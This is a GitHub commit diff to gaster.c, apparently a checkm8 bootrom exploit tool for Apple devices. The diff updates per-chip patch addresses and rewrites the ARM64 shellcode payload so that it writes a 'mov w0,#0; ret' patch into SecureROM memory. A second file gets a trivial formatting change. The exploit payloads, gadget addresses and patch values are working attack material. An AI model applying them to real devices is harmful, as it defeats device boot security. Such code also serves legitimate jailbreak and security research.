Skip to content

Commit

Permalink
Update
Browse files Browse the repository at this point in the history
  • Loading branch information
@0x7ff
0x7ff committed Jun 12, 2022
1 parent 7ffffff commit 7ffffff
Show file tree
Hide file tree
Showing 2 changed files with 21 additions and 19 deletions.
38 changes: 20 additions & 18 deletions gaster.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -647,7 +647,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
cpid = 0x8960;
config_large_leak = 7936;
config_overwrite_pad = 0x5C0;
patch_addr = 0x100005CE0;
patch_addr = 0x100005844;
memcpy_addr = 0x10000ED50;
aes_crypto_cmd = 0x10000B9A8;
boot_tramp_end = 0x1800E1000;
Expand All @@ -660,7 +660,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x180080562;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1991.0.0.2.16]") != NULL) {
cpid = 0x7001;
patch_addr = 0x10000AD04;
patch_addr = 0x10000AA8C;
memcpy_addr = 0x100013F10;
aes_crypto_cmd = 0x100010A90;
io_buffer_addr = 0x18010D500;
Expand All @@ -676,7 +676,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x180080C2A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1992.0.0.1.19]") != NULL) {
cpid = 0x7000;
patch_addr = 0x100007E98;
patch_addr = 0x100007C20;
memcpy_addr = 0x100010E70;
aes_crypto_cmd = 0x10000DA90;
io_buffer_addr = 0x18010D300;
Expand All @@ -692,7 +692,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x18008062A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.2.22]") != NULL) {
cpid = 0x8003;
patch_addr = 0x10000812C;
patch_addr = 0x100007D38;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
Expand All @@ -710,7 +710,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x1800807DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.3.3]") != NULL) {
cpid = 0x8000;
patch_addr = 0x10000812C;
patch_addr = 0x100007D38;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
Expand All @@ -733,7 +733,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000404;
nop_gadget = 0x10000CD60;
ret_gadget = 0x100000118;
patch_addr = 0x100007668;
patch_addr = 0x100007188;
ttbr0_addr = 0x180050000;
func_gadget = 0x10000CD40;
write_ttbr0 = 0x1000003B4;
Expand All @@ -758,7 +758,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000434;
nop_gadget = 0x10000CC6C;
ret_gadget = 0x10000015C;
patch_addr = 0x1000074AC;
patch_addr = 0x100007044;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CC4C;
write_ttbr0 = 0x1000003E4;
Expand All @@ -783,7 +783,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000444;
nop_gadget = 0x10000CD0C;
ret_gadget = 0x100000148;
patch_addr = 0x100007630;
patch_addr = 0x100007188;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CCEC;
write_ttbr0 = 0x1000003F4;
Expand All @@ -808,7 +808,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x1000004AC;
nop_gadget = 0x10000A9C4;
ret_gadget = 0x100000148;
patch_addr = 0x10000624C;
patch_addr = 0x100005D70;
ttbr0_addr = 0x18000C000;
func_gadget = 0x10000A9AC;
write_ttbr0 = 0x10000045C;
Expand All @@ -833,7 +833,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000494;
nop_gadget = 0x100008DB8;
ret_gadget = 0x10000012C;
patch_addr = 0x100004854;
patch_addr = 0x100004378;
ttbr0_addr = 0x18000C000;
func_gadget = 0x100008DA0;
write_ttbr0 = 0x100000444;
Expand Down Expand Up @@ -1096,9 +1096,9 @@ checkm8_stage_patch(const usb_handle_t *handle) {
0xD63F0020, /* blr x1 */
0x58000321, /* ldr x1, =usb_serial_number_string_descriptor */
0x39000020, /* strb w0, [x1] */
0x52BA5002, /* mov w2, #0xD2800000 */
0x58000303, /* ldr x3, =patch_addr */
0xB9000062, /* str w2, [x3] */
0x58000323, /* ldr x3, =patch_addr */
0x58000342, /* ldr x2, =patch_val */
0xF9000062, /* str x2, [x3] */
0xA8C17BFD, /* ldp x29, x30, [sp], #0x10 */
0xD65F03C0 /* ret */
}, payload_A9[] = {
Expand Down Expand Up @@ -1135,9 +1135,9 @@ checkm8_stage_patch(const usb_handle_t *handle) {
0xD50E871F, /* tlbi alle3 */
0xD5033F9F, /* dsb sy */
0xD5033FDF, /* isb */
0x52BA5002, /* mov w2, #0xD2800000 */
0x58000403, /* ldr x3, =patch_addr */
0xB9000062, /* str w2, [x3] */
0x58000423, /* ldr x3, =patch_addr */
0x58000442, /* ldr x2, =patch_val */
0xF9000062, /* str x2, [x3] */
0xB2790021, /* orr x1, x1, #ARM_TTE_BLOCK_AP(AP_RONA) */
0xF9000001, /* str x1, [x0] */
0xD5033F9F, /* dsb sy */
Expand Down Expand Up @@ -1190,11 +1190,11 @@ checkm8_stage_patch(const usb_handle_t *handle) {
};
struct {
uint8_t payload[sizeof(payload_notA9)];
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, patch_addr;
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, patch_addr, patch_val;
} notA9;
struct {
uint8_t payload[sizeof(payload_A9)];
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, ttbr0_vrom_addr, patch_addr;
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, ttbr0_vrom_addr, patch_addr, patch_val;
} A9;
struct {
uint8_t payload[sizeof(payload_handle_checkm8_request)];
Expand Down Expand Up @@ -1247,6 +1247,7 @@ checkm8_stage_patch(const usb_handle_t *handle) {
A9.usb_serial_number_string_descriptor = usb_serial_number_string_descriptor;
A9.ttbr0_vrom_addr = ttbr0_addr + ttbr0_vrom_off;
A9.patch_addr = patch_addr;
A9.patch_val = 0xD65F03C052800000ULL;
memcpy(payload + payload_sz, &A9, sizeof(A9));
payload_sz += sizeof(A9);
} else {
Expand All @@ -1262,6 +1263,7 @@ checkm8_stage_patch(const usb_handle_t *handle) {
notA9.usb_create_string_descriptor = usb_create_string_descriptor;
notA9.usb_serial_number_string_descriptor = usb_serial_number_string_descriptor;
notA9.patch_addr = patch_addr;
notA9.patch_val = 0xD65F03C052800000ULL;
if(cpid == 0x8001 || cpid == 0x8010 || cpid == 0x8011 || cpid == 0x8012 || cpid == 0x8015) {
notA9.patch_addr += ARM_16K_TT_L2_SZ;
}
Expand Down
2 changes: 1 addition & 1 deletion lzfse.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -86,7 +86,7 @@ typedef struct {
uint16_t literal_state[4];
int32_t lmd_bits;
uint16_t l_state, m_state, d_state, l_freq[LZFSE_ENCODE_L_SYMBOLS], m_freq[LZFSE_ENCODE_M_SYMBOLS], d_freq[LZFSE_ENCODE_D_SYMBOLS], literal_freq[LZFSE_ENCODE_LITERAL_SYMBOLS];
} __attribute__((__packed__,__aligned__(2))) lzfse_compressed_block_header_v1;
} __attribute__((__packed__, __aligned__(2))) lzfse_compressed_block_header_v1;

static const uint8_t l_extra_bits[LZFSE_ENCODE_L_SYMBOLS] = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 5, 8
Expand Down

0 comments on commit 7ffffff

Please sign in to comment.